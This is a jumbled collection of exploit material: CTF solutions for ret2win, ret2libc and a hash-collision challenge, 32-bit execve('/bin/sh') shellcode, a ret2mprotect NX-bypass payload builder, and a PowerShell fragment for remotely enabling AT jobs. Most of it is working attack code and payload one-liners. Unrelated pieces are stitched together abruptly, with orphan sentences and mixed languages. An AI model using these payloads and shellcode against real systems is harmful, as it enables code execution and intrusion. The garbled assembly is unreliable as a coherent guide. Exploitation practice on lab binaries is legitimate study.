#! /usr/bin/python
import sys
import struct

# Q packs one 32-bit word in the host's byte order.  This assumes the target
# runs on the same architecture as the machine building the payload; for a
# 32-bit x86 target the little-endian form "<I" is the one wanted.
if sys.byteorder == 'little':
    Q = lambda x: struct.pack("<I", x)
elif sys.byteorder == 'big':
    Q = lambda x: struct.pack(">I", x)
# This code could be used to remotely enable and launch AT jobs regardless of the fact that AT is deprecated in Win8+.
$HKLM = [UInt32] 2147483650   # 0x80000002 = HKEY_LOCAL_MACHINE
# Check to see if EnableAt is set
$Result = Invoke-CimMethod -Namespace root/default -ClassName StdRegProv -MethodName GetDWORDValue -Arguments @{
    hDefKey     = $HKLM
    sSubKeyName = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration'
    sValueName  = 'EnableAt'
}
# $Result.ReturnValue is 0 when the read succeeded; $Result.uValue holds the DWORD (1 = AT jobs enabled).
very trivial though.. :v
(1) junk buffer is 0x80 + 12
(2) find address of libc_system in gdb
(3) find address of libc_exit in gdb
(4) find '/bin/sh' string in gdb (find &system,+9999999,"/bin/sh")
(5) pwned!
Same idea as rop-1, but this binary has no function that calls system('/bin/sh') the way the 'not_called' subroutine does in rop-1. Fortunately there is a global variable called 'not_used' whose value is '/bin/sh', so we can use the 'ret2libc' method on this contrived binary: return into libc's system() and hand it that string as its argument. Payload construction below:
["\x41"*(0x80 + 12) (to reach vulnerable_function's saved return address)] + [libc_system addr] + [libc_exit addr (the fake return address system() returns into, so the process exits cleanly instead of crashing)] + [address of the 'not_used' global variable (system()'s argument)]
and then.. pwned!!
(python -c 'import sys,struct;sys.stdout.write("\x41"*(0x80 + 12) + struct.pack("<I", libc_system) + struct.pack("<I", libc_exit) + struct.pack("<I", not_used))'; cat -) | ./rop-2
(libc_system, libc_exit and not_used stand for the three addresses found in gdb; the literal values and the rop-2 binary's file name are not preserved here.)
To overwrite the 'vulnerable_function' return address we need 0x80 + 12 bytes of junk followed by the address of 'not_called'. So the payload skeleton is: ["\x41"*(0x80 + 12)] + [address of 'not_called' subroutine]
(python -c 'import sys,struct;sys.stdout.write("\x41"*(0x80 + 12) + struct.pack("<I", 0x080484a4))'; cat -) | ./rop1-fa6168f4d8eba0eb
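As an added example (not part of the original write-up), the two payload layouts above in one Python 3 script: rop-1's return into `not_called`, and rop-2's ret2libc frame. The 0x080484a4 address is the one used in the rop-1 command; the rop-2 addresses are read from the command line because they come from gdb for your own copy of the binary. `frame_words` decodes the words that land on the stack so the layout can be checked before it is sent, and `check_payload` refuses bytes the input routine would stop at. The script name `build.py` is an assumption.

```python
#!/usr/bin/env python3
# Added example, not code from the write-up: build the rop-1 / rop-2 payloads
# and check their layout before piping them into the binary.
import struct
import sys

PAD = 0x80 + 12  # bytes from the start of the buffer to the saved return address


def p32(value):
    """Pack one 32-bit little-endian word (the targets are 32-bit x86)."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def build_ret2func(target, pad=PAD):
    """rop-1: the new return address is a function that already does the
    work for us (the 'not_called' subroutine)."""
    return b"\x41" * pad + p32(target)


def build_ret2libc(system, ret_after, binsh, pad=PAD):
    """rop-2: return into libc's system() with a hand-made stack frame.

    After the vulnerable function's 'ret' into system(), esp points at
    ret_after, which system() treats as its own return address, and the
    word after it (binsh) is its first argument.  Using exit()'s address
    as ret_after makes the process end cleanly once the shell is closed.
    """
    return b"\x41" * pad + p32(system) + p32(ret_after) + p32(binsh)


def frame_words(payload, pad=PAD):
    """Decode the words that overwrite the saved return address and follow it."""
    tail = payload[pad:]
    usable = len(tail) - len(tail) % 4
    return [struct.unpack("<I", tail[i:i + 4])[0] for i in range(0, usable, 4)]


def check_payload(payload, bad=b"\n"):
    """Reject payloads containing bytes the input routine stops at: a newline
    ends gets()/fgets(); add b"\\x00" when the data goes through strcpy()."""
    found = [b for b in bad if b in payload]
    if found:
        raise ValueError("bad bytes in payload: %s" % ", ".join("0x%02x" % b for b in found))
    return payload


if __name__ == "__main__":
    # rop-1 uses the address from the command above; rop-2 takes the three
    # addresses found in gdb:  python3 build.py <system> <exit> <not_used>
    if len(sys.argv) == 4:
        system, exit_, binsh = (int(a, 16) for a in sys.argv[1:])
        payload = build_ret2libc(system, exit_, binsh)
    else:
        payload = build_ret2func(0x080484A4)
    sys.stdout.buffer.write(check_payload(payload))
```

Pipe the output into the binary exactly as the `(python ...; cat -) | ./rop1-...` command does; `cat -` keeps stdin open so the spawned shell can be used.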
col@ubuntu:~$ ./col "$(python -c 'import struct;print "\xff"*(1 << 4) + struct.pack("<I", (0x21DD09EC + 4))')"
daddy! I just managed to create a hash collision :)
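As an added example (not from the original solution), the arithmetic behind that argument in Python 3. It assumes, as the payload above relies on, that the binary's check_password() adds the five little-endian 32-bit words of a 20-byte input and compares the wrapped sum with 0x21DD09EC. `page_payload()` reproduces the exact bytes passed as argv[1]; `forge()` generalises the trick to other targets and fillers and refuses any result that contains a NUL byte, since an argv string would be cut short there.

```python
#!/usr/bin/env python3
# Added example, not the original solution: reproduce and generalise the
# hash-collision argument above.
import struct

MASK = 0xFFFFFFFF
TARGET = 0x21DD09EC  # value the binary compares the hash against


def check_password(data):
    """Assumed model of the binary's check_password(): sum the five
    little-endian 32-bit words of a 20-byte input, wrapping mod 2**32."""
    if len(data) != 20:
        raise ValueError("input must be exactly 20 bytes, got %d" % len(data))
    return sum(struct.unpack("<5I", data)) & MASK


def page_payload():
    """Exactly the bytes the command above passes as argv[1]:
    four 0xFFFFFFFF words (each is -1 mod 2**32, so -4 in total)
    followed by TARGET + 4, which cancels the -4."""
    return b"\xff" * (1 << 4) + struct.pack("<I", TARGET + 4)


def forge(target, filler=MASK):
    """General form: four copies of `filler` plus whatever word makes the
    sum wrap to `target`.  argv strings cannot carry NUL bytes, so a
    payload containing 0x00 is refused and a different filler is needed."""
    last = (target - 4 * filler) & MASK
    payload = struct.pack("<5I", filler, filler, filler, filler, last)
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte; pick another filler")
    return payload


def find_collision(target):
    """Try a few NUL-free fillers and return the first payload that works."""
    for filler in (MASK, 0x01010101, 0x7F7F7F7F, 0x10101010):
        try:
            return forge(target, filler)
        except ValueError:
            continue
    raise ValueError("no NUL-free payload found for 0x%08x" % target)


if __name__ == "__main__":
    payload = find_collision(TARGET)
    print(payload.hex(), "->", hex(check_password(payload)))
```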
[execve("/bin/sh", ["/bin/sh", NULL, NULL], NULL)]
# 28 bytes, no NUL bytes.
# xor eax,eax / push eax / push "n/sh" / push "//bi" / mov ebx,esp   -> ebx = "//bin/sh\0"
# push eax / push eax / push ebx / mov ecx,esp                        -> ecx = argv {ebx, 0, 0}
# mov edx,[esp+8]  -> loads the pushed 0, so envp = NULL
# mov al,0xb / int 0x80  -> sys_execve
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50" + \
"\x50\x53\x89\xe1\x8b\x54\x24\x08\xb0\x0b\xcd\x80"
[execve("/bin/sh", ["/bin/sh", NULL, NULL], NULL)]
# Same as above except for one byte: 0x8d instead of 0x8b, i.e. lea edx,[esp+8]
# instead of mov edx,[esp+8].  edx then points at the NULL word rather than
# being NULL, so envp is an empty (NULL-terminated) environment, which execve also accepts.
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50" + \
"\x50\x53\x89\xe1\x8d\x54\x24\x08\xb0\x0b\xcd\x80"
Thanks to @funoverip for his password decryption tool.
Thus, to improve my reversing skills, I'm back.
Ret2mprotect is an elegant way to bypass a mitigation like NX/DEP: instead of jumping straight to shellcode on the (non-executable) stack, the overwritten return address points at libc's mprotect(), with arguments that mark the page holding the shellcode readable, writable and executable, and mprotect()'s fake return address then lands in the shellcode.
I assume that you are comfortable with x86 stack-based overflows, ASM and shellcode.
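An added illustration, not the post's own code, of the stack frame such a chain needs on 32-bit x86. It assumes a classic stack overflow with a known buffer address (no ASLR, or a leaked stack pointer) and a known address for libc's mprotect(); the addresses in the `__main__` block are placeholders. The shellcode is the 28-byte execve("/bin/sh") string quoted earlier on this page, and `decode_chain` reads the five chain words back so the frame can be checked.

```python
#!/usr/bin/env python3
# Added example, not from the original post: lay out a ret2mprotect chain
# for a 32-bit x86 stack overflow.  mprotect(addr, len, prot) is reached
# by 'ret', so the cdecl frame is: [ret addr for mprotect][addr][len][prot].
import struct

PAGE = 0x1000
PROT_READ, PROT_WRITE, PROT_EXEC = 1, 2, 4

# execve("/bin/sh", ["/bin/sh", NULL, NULL], NULL), quoted above (28 bytes)
SHELLCODE = (b"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50"
             b"\x50\x53\x89\xe1\x8b\x54\x24\x08\xb0\x0b\xcd\x80")

CHAIN_WORDS = ("mprotect", "ret", "addr", "len", "prot")


def p32(value):
    return struct.pack("<I", value & 0xFFFFFFFF)


def page_floor(addr):
    return addr & ~(PAGE - 1)


def page_ceil(addr):
    return (addr + PAGE - 1) & ~(PAGE - 1)


def build_ret2mprotect(mprotect, buf_addr, pad, shellcode=SHELLCODE):
    """Payload layout (buffer starts at buf_addr):

        pad bytes of filler          overwrite up to the saved return address
        mprotect                     new return address: libc's mprotect()
        ret  = shellcode address     what mprotect() returns into
        addr = page of the buffer    first argument, page-aligned as the kernel requires
        len  = up to shellcode end   rounded up to a whole page
        prot = R|W|X (7)
        shellcode                    now sitting in an executable page
    """
    chain_len = 4 * len(CHAIN_WORDS)
    shellcode_addr = buf_addr + pad + chain_len
    addr = page_floor(buf_addr)
    length = page_ceil(shellcode_addr + len(shellcode)) - addr
    chain = (p32(mprotect) + p32(shellcode_addr) + p32(addr) + p32(length)
             + p32(PROT_READ | PROT_WRITE | PROT_EXEC))
    return b"\x41" * pad + chain + shellcode


def decode_chain(payload, pad):
    """Read the five chain words back out of a payload, for checking."""
    words = struct.unpack("<5I", payload[pad:pad + 20])
    return dict(zip(CHAIN_WORDS, words))


if __name__ == "__main__":
    import sys
    # Placeholder addresses; take the real ones from gdb/Ollydbg for your target.
    payload = build_ret2mprotect(mprotect=0xF7E00000, buf_addr=0xBFFFF500, pad=0x80 + 12)
    sys.stdout.buffer.write(payload)
```

The prot word (7) packs as `07 00 00 00`, so this frame is fine for input read with read() or fgets() but not for a strcpy()-style overflow, where the NUL bytes would end the copy.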
Requirements:
- Ollydbg
- OllyDumpEx Plugin
- A brain with some knowledge of RunPE